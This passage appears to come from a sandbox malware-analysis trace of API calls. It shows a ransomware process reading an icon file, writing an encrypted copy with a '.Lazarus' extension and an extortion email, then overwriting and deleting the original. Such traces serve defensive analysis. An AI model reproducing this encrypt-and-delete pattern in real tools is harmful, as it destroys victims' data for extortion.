nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0075.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0075.548] AreFileApisANSI () returned 1 [0075.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico", lpUsedDefaultChar=0x0) returned 43 [0075.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.549] AreFileApisANSI () returned 1 [0075.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0075.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.549] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.549] GetFileType (hFile=0x42c) returned 0x1 [0075.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0075.549] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.550] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.550] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.550] CloseHandle (hObject=0x42c) returned 1 [0075.550] AreFileApisANSI () returned 1 [0075.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0075.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.550] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.550] GetFileType (hFile=0x42c) returned 0x1 [0075.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0075.550] CloseHandle (hObject=0x42c) returned 1 [0075.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0075.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.551] AreFileApisANSI () returned 1 [0075.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.552] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.552] AreFileApisANSI () returned 1 [0075.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0075.552] GetLastError () returned 0x0 [0075.552] SetLastError (dwErrCode=0x0) [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0075.552] GetLastError () returned 0x0 [0075.552] SetLastError (dwErrCode=0x0) [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76098 [0075.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0075.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0075.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0075.553] AreFileApisANSI () returned 1 [0075.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0075.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0075.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76098, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0075.553] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.553] GetFileType (hFile=0x42c) returned 0x1 [0075.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0075.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0075.553] AreFileApisANSI () returned 1 [0075.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.554] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.554] GetFileType (hFile=0x410) returned 0x1 [0075.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.554] GetLastError () returned 0x0 [0075.554] SetLastError (dwErrCode=0x0) [0075.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.554] GetLastError () returned 0x0 [0075.554] SetLastError (dwErrCode=0x0) [0075.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0075.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.554] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0075.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.556] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0075.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0075.556] GetLastError () returned 0x0 [0075.556] SetLastError (dwErrCode=0x0) [0075.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d5a0 [0075.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0075.556] GetLastError () returned 0x0 [0075.557] SetLastError (dwErrCode=0x0) [0075.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0075.557] WriteFile (in: hFile=0x42c, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0075.558] GetLastError () returned 0x0 [0075.558] SetLastError (dwErrCode=0x0) [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0075.558] GetLastError () returned 0x0 [0075.558] SetLastError (dwErrCode=0x0) [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0075.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0075.558] CloseHandle (hObject=0x42c) returned 1 [0075.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.559] CloseHandle (hObject=0x410) returned 1 [0075.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0075.559] AreFileApisANSI () returned 1 [0075.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.559] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.560] GetFileType (hFile=0x410) returned 0x1 [0075.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.560] GetLastError () returned 0xb7 [0075.561] SetLastError (dwErrCode=0xb7) [0075.561] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.561] CloseHandle (hObject=0x410) returned 1 [0075.562] AreFileApisANSI () returned 1 [0075.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 43 [0075.562] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.563] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0075.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.563] 